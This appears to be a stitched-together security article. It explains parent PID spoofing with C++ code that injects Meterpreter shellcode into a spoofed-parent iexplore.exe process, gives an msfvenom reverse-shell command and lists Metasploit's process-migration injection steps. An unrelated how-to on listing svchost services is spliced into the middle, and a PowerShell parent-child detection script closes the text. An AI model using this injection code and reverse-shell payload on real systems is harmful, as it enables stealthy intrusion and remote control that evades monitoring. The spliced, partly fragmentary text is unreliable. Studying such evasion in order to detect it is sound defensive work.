Monitoring the relationships between parent and child processes is a very common technique for threat hunting teams to detect malicious activity. For example, if PowerShell is the child process and Microsoft Word is the parent, then it is an indication of compromise. Various EDRs (endpoint detection and response products) can detect this abnormal activity easily. This has led red teams and adversaries to use parent PID spoofing as an evasion method.

The Windows API call "CreateProcess" supports a parameter which allows the user to assign the parent PID. This means that a malicious process can be created under a parent different from the one that actually executed it. Originally this technique was introduced to the wider information security audience in 2009 by Didier Stevens. A proof of concept written in C++ was released (SelectMyParent) that allows the user to select the parent process by specifying its PID (process identifier).

The "CreateProcess" function was used in conjunction with "STARTUPINFOEX" and "LPPROC_THREAD_ATTRIBUTE_LIST". The PID of the chosen parent is looked up from a process snapshot; only this fragment of that lookup appears in the article:

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (Process32First(snapshot, &process))
        while (Process32Next(snapshot, &process))

The shellcode (for example, generated with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x EXITFUNC=thread -f c) is held in the shellCode array. The spoofed parent handle is attached to the new process through the attribute list, the process is created suspended, and the payload is written into it and queued as an APC:

    HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());
    ZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));
    InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
    sInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
    InitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);
    UpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);
    sInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);
    CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);
    LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    BOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);
    QueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);

[Figure: Macro Scheduled Task – Process Properties]

Metasploit

Metasploit Framework contains a post-exploitation module which can be used to migrate an existing Meterpreter session to another process on the system. The module uses the same functions as the other tooling described in this article in order to rewrite the existing shellcode into the address space of another process. Specifically, the module follows the process below:

- Check the architecture of the target process (32-bit or 64-bit).
- Check if the Meterpreter session has the SeDebugPrivilege.
- Retrieve the payload from the existing process.
- Call the OpenProcess() API to gain access to the virtual memory of the target process.
- Call the VirtualAllocEx() API to allocate RWX memory in the target process.
- Call the WriteProcessMemory() API to write the payload into the virtual memory space of the process.
- Call the CreateRemoteThread() API to create a thread in the virtual memory space of the target process.

An existing session is required to be defined, with the PID and the name of the target process.

This will automatically bring you to the Details tab and it will automatically select the line that corresponds to that process. Now we can see that the DHCP Client service is running inside svchost.exe with a process ID of 1504. This is by far the easiest way to accomplish this task, but it requires Windows 10. If you are running Windows 7 or earlier, read on about other methods.

On any version of Windows, you can use the command line to generate a list of all the svchost.exe processes along with the service that is running inside each. To do this, simply open a command prompt by clicking on Start and typing in cmd. At the command prompt, go ahead and copy/paste the following command:

    tasklist /svc | find "svchost.exe"

This will generate a list of all running processes, pass that list to the find command and filter it to show only the svchost.exe processes. If you want to output this to a text file, use the following command:

    tasklist /svc | find "svchost.exe" > c:\tasklist.txt

Note that in order to output to the root of the C drive, you'll need to open an Administrator command prompt (Start, type cmd, right-click on Command Prompt and choose Run as Administrator).
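As an added example (not code from either article above), here is the parent/child check described at the start of the parent PID spoofing section, written in PowerShell for a live Windows host. The two process-name lists are assumptions to adapt to your environment; as the text explains, a process created with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS reports the chosen parent and so passes this naive check.

```powershell
# Added example, not code from either article: flag the pairing the text calls
# out (an Office application as the parent of a shell or script host).
# Both name lists are assumptions; extend them for your environment.
$OfficeParents      = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe')
$SuspiciousChildren = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe',
                        'cscript.exe', 'mshta.exe', 'rundll32.exe', 'regsvr32.exe')

function Find-OfficeSpawnedShells {
    # Snapshot every process with the fields the check needs.
    $procs = Get-CimInstance -ClassName Win32_Process |
        Select-Object ProcessId, ParentProcessId, Name, CommandLine, CreationDate

    # Index by PID so each child can look up its recorded parent directly.
    # Keys are cast to the same type on both sides so hashtable lookups match.
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[uint32]$p.ProcessId] = $p }

    foreach ($child in $procs) {
        if ($SuspiciousChildren -notcontains $child.Name) { continue }

        $parent = $byPid[[uint32]$child.ParentProcessId]
        # ParentProcessId is only a number. If the real parent exited and its
        # PID was reused, the entry found here is a newer, unrelated process,
        # so a "parent" created after its child is discarded as PID reuse.
        if ($null -eq $parent -or $parent.CreationDate -gt $child.CreationDate) { continue }

        # A process whose parent was set with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
        # shows that chosen parent here; this is the check spoofing evades.
        if ($OfficeParents -contains $parent.Name) {
            [pscustomobject]@{
                ChildPid    = $child.ProcessId
                Child       = $child.Name
                ParentPid   = $parent.ProcessId
                Parent      = $parent.Name
                CommandLine = $child.CommandLine
            }
        }
    }
}

# Print any hits as a table; an empty result means no such pairing is live now.
Find-OfficeSpawnedShells | Format-Table -AutoSize
```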